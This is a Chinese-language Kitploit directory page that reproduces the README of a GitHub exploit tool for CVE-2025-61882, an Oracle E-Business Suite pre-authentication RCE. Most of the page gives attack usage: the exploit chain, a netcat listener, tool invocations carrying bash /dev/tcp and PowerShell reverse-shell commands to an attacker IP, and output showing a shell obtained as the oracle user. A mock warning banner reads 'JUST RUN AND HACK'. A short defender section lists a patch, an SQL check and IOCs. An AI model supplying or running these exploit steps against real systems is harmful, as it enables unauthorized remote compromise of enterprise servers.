Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-61882-POC — CVE-2025-61882 的漏洞利用,这是 Oracle E-Business Suite 中的一个严重预认证 RCE 漏洞。它结合了 SSRF、CRLF 注入、HTTP 请求走私和 XSLT 注入,以实现未经认证的远程代码执行。 | Kitploit
工具/GitHubGitHub/mindflarex/cve-2025-61882-poc
Payload生成漏洞分析漏洞利用Web应用程序漏洞利用渗透测试红队远程访问工具
GitHubmindflarex/cve-2025-61882-poc

CVE-2025-61882-POC

CVE-2025-61882 的漏洞利用,这是 Oracle E-Business Suite 中的一个严重预认证 RCE 漏洞。它结合了 SSRF、CRLF 注入、HTTP 请求走私和 XSLT 注入,以实现未经认证的远程代码执行。

查看仓库
2个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2025-61882 安全测试工具

CVSS Status Platform License

🚨 重要法律警告

技术详情请参阅我们的博客文章

本工具仅用于经授权的安全测试

root@kitploit:~
╔══════════════════════════════════════════════════════════════╗
║                                                              ║
║  🚨 UNAUTHORIZED ACCESS TO COMPUTER SYSTEMS IS ILLEGAL 🚨   ║
║                                                              ║
║  By using this tool, you acknowledge and agree that:         ║
║                                                              ║
║                                                              ║
║                 FCK THIS JUST RUN AND HACK                   ║
║                                                              ║
║                                                              ║
║                                                              ║
║                                                              ║
║                                                              ║
╚══════════════════════════════════════════════════════════════╝

📋 概述

针对 CVE-2025-61882 的安全测试工具,这是一个影响 Oracle E-Business Suite 的严重预认证远程代码执行漏洞。

创建者: Mindflare

漏洞详情

  • CVE 编号: CVE-2025-61882
  • CVSS 评分: 9.8(严重)
  • 攻击向量: 网络(未认证)
  • 攻击复杂度: 中等
  • 所需权限: 无
  • 用户交互: 无
  • 受影响版本: Oracle E-Business Suite 12.2.3 - 12.2.14
  • 补丁状态: 已于 2025 年 10 月 4 日发布紧急补丁
  • 利用状态: ⚠️ 自 2025 年 8 月以来已被 Cl0p 勒索软件积极利用

技术摘要

CVE-2025-61882 是一条复杂的利用链,组合了五个不同的漏洞:

  1. SSRF - 通过 /OA_HTML/configurator/UiServlet 进行服务端请求伪造
  2. CRLF 注入 - 在 return_url 参数中进行 HTTP 头注入
  3. HTTP 走私 - 利用 Keep-alive 连接访问内部服务(端口 7201)
  4. 认证绕过 - 通过 /OA_HTML/help/../ 前缀进行路径遍历
  5. XSLT 注入 - 恶意 XSL 模板处理导致 RCE

🎯 预期使用场景

✅ 可接受的使用

  • 经授权的渗透测试(需有书面许可)
  • 对您自己拥有的系统进行安全研究
  • 在受控实验环境中进行漏洞验证
  • 具有适当范围文档的红队演习
  • 获得机构批准的学术研究
  • 事件响应与取证分析

❌ 禁止的使用

  • 任何未经授权的系统访问
  • 在未获得明确书面许可的情况下测试系统
  • 恶意活动或造成损害
  • 未经批准攻击生产系统
  • 用于犯罪目的
  • 任何违反适用法律的活动

📦 安装

先决条件

  • Python 3.7 或更高版本
  • pip 包管理器
  • 与目标(仅限授权)的网络连接
  • Netcat 或类似的监听器用于接收反向 Shell

设置

root@kitploit:~
# Clone the repository
git clone https://github.com/[YOUR-USERNAME]/CVE-2025-61882-POC
cd CVE-2025-61882-POC

# Install dependencies
pip3 install -r requirements.txt

# Make script executable (Linux/Mac)
chmod +x cve-2025-61882-detector.py

🚀 使用方法

第 1 步:设置监听器

在单独的终端中启动 netcat 监听器:

root@kitploit:~
# Linux/Mac
nc -lvnp 4444

# Windows
nc.exe -lvnp 4444

第 2 步:运行工具

基本用法(Linux 目标):

root@kitploit:~
python3 cve-2025-61882-detector.py \
  --target http://192.168.1.22:8000 \
  --lhost 192.168.1.10 \
  --lport 80 \
  --command 'bash -i >& /dev/tcp/192.168.1.10/4444 0>&1' \
  --platform linux

Windows 目标:

root@kitploit:~
python3 cve-2025-61882-detector.py \
  --target http://192.168.1.22:8000 \
  --lhost 192.168.1.10 \
  --lport 80 \
  --command 'powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient(\"192.168.1.10\",4444)"' \
  --platform windows

参数


📊 示例输出

工具输出

root@kitploit:~
[*] Target URL:    http://192.168.1.22:8000
[*] Listener IP:   192.168.1.10
[*] Listener Port: 80
[*] Platform:      linux

[*] HTTP server started on 192.168.1.10:80
[*] Connecting to target to retrieve CSRF token...
[*] CSRF TOKEN: WLDW-GNFH-MB4K-76EA-JB48-VY3X-L30R-NZT0
[*] Cooking HTTP smuggle stub...
[*] Sending exploit payload...
[*] Exploit payload sent successfully

[+] 192.168.1.22 - GET /OA_HTML/help/../ieshostedsurvey.xsl HTTP/1.1
[+] XSL payload served successfully

Netcat 监听器输出(如果存在漏洞)

root@kitploit:~
ubuntu@attacker:~$ nc -lvnp 4444
Listening on 0.0.0.0 4444
Connection received on 192.168.1.22 30290
bash: no job control in this shell
[oracle@apps EBS_domain]$ id
uid=54321(oracle) gid=54321(oinstall) groups=54321(oinstall)
[oracle@apps EBS_domain]$

🛡️ 检测与防御

面向安全防御人员

立即采取的行动

  1. 应用 Oracle 紧急补丁(文档 ID:30061882.1)
  2. 排查失陷迹象:
    root@kitploit:~
    SELECT * FROM XDO_TEMPLATES_B 
    WHERE TEMPLATE_CODE LIKE 'TMP%' OR TEMPLATE_CODE LIKE 'DEF%';
    
  3. 检查自 2025 年 8 月以来的访问日志
  4. 阻止 EBS 服务器的出站互联网访问

检测指标

网络 IOC:

root@kitploit:~
200.107.207.26 (Cl0p C2)
161.97.99.49 (Secondary)

HTTP 特征:

  • POST /OA_HTML/configurator/UiServlet
  • POST /OA_HTML/SyncServlet
  • GET /OA_HTML/help/../*.jsp
  • 参数中包含 CRLF 字符

📚 参考资料

  • Oracle 安全警报公告
  • CISA KEV 目录
  • Google/Mandiant 分析
  • watchTowr Labs 研究

📜 许可证

MIT 许可证,附带教育用途限制 - 请参阅 LICENSE

免责声明: 本软件仅用于经授权的安全测试。未经授权访问计算机系统是违法的。作者不对滥用行为承担任何责任。


root@kitploit:~

**Created by:** Mindflare | **Last Updated:** October 2025
下载工具
参数描述是否必需示例
--target目标 Oracle EBS URL是http://192.168.1.22:8000
--lhost您的 IP 地址(用于回调)是192.168.1.10
--lportHTTP 服务器端口(用于提供 XSL 载荷)是80 或 8080
--command在目标上执行的命令是见上面的示例
--platform目标操作系统:linux 或 windows是linux